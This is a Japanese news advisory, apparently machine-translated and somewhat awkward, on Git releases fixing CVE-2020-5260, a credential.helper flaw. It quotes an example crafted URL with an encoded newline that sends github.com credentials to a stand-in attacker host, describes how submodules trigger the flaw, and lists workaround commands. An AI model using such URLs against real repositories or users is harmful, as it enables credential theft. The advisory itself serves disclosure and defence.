発行済み 分散ソース管理システム Git 2.26.1、2.25.3、2.24.2、2.23.2、2.22.3、2.21.2、2.20.3、2.19.4、2.18.3、2.17.4 の修正リリース排除したもの 脆弱性 (CVE-2020-5260) ハンドラー内で "資格情報.ヘルパーこれにより、git クライアントが改行文字を含む特別にフォーマットされた URL を使用してリポジトリにアクセスすると、資格情報が間違ったホストに送信されます。 この脆弱性を利用して、別のホストからの認証情報が攻撃者が制御するサーバーに送信されるようにすることができます。
「https://evil.com?%0ahost=github.com/」のような URL を指定すると、ホスト evil.com に接続する際の資格情報ハンドラーは、github.com に指定された認証パラメーターを渡します。 この問題は、サブモジュールの URL の処理を含む「git clone」などの操作を実行するときに発生します (たとえば、「git submodule update」は、リポジトリの .gitmodules ファイルで指定された URL を自動的に処理します)。 この脆弱性は、開発者が URL を確認せずにリポジトリのクローンを作成する状況 (サブモジュールを操作する場合など) や、自動アクションを実行するシステム (パッケージ ビルド スクリプトなど) で最も危険です。
新しいバージョンの脆弱性をブロックするには 禁止されています 資格情報交換プロトコルを通じて送信される値には改行文字を渡します。 ディストリビューションの場合、ページでパッケージ更新のリリースを追跡できます。 Debianの, Ubuntu, RHEL, SUSE/openSUSE, フェドーラ, アーチ, FreeBSDの.
問題をブロックするための回避策として おすすめです パブリック リポジトリにアクセスする場合は credential.helper を使用しないでください。また、チェックされていないリポジトリでは「--recurse-submodules」モードで「git clone」を使用しないでください。 credential.helper ハンドラーを完全に無効にするには、次のようにします。 保存 そしてパスワードを取得する キャッシュ、保護されています ボールト またはパスワード付きのファイルの場合は、次のコマンドを使用できます。
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
出所: オープンネット.ru